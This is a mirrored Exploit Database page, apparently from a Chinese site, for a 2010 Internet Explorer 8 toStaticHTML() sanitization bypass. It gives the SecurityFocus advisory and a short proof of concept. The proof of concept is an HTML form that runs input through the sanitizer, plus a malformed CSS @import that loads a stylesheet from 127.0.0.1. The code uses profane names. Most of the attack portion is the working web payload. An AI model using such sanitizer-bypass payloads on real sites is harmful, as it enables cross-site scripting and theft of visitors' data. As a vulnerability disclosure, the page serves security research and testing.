Microsoft Internet Explorer 8 – ‘toStaticHTML()’ HTML Sanitization Bypass

• Exploit Database
• 94 阅读

• 作者： Mario Heiderich
  日期： 2010-08-16
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/34478/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39

  source: https://www.securityfocus.com/bid/42467/info   Internet Explorer 8 is prone to a security-bypass weakness.   Internet Explorer 8 includes a method designed to sanitize executable script constructs from HTML. Attackers can bypass this protection, allowing script code to execute on the client, for example in a &apos;postMessage&apos; call.   Attackers can leverage this issue to obtain sensitive information or potentially launch cross-site scripting attacks on unsuspecting users of targeted sites. Other attacks may also be possible.   <script type="text/javascript"> function fuckie() { var szInput = document.shit.input.value; var szStaticHTML = toStaticHTML(szInput);   ResultComment = szStaticHTML; document.shit.output.value = ResultComment; } </script>   <form name="shit"> <textarea name=&#039;input&#039; cols=40 rows=20> &lt;/textarea&gt; <textarea name=&#039;output&#039; cols=40 rows=20> &lt;/textarea&gt;   <input type=button value="fuck_me" name="fuck" onclick=fuckie();> </form>     <style>   } () import <%7D () import> url(&#039;//127.0.0.1/1.css&#039;);aaa   {;}   </style>   <div id="x">Fuck Ie</div>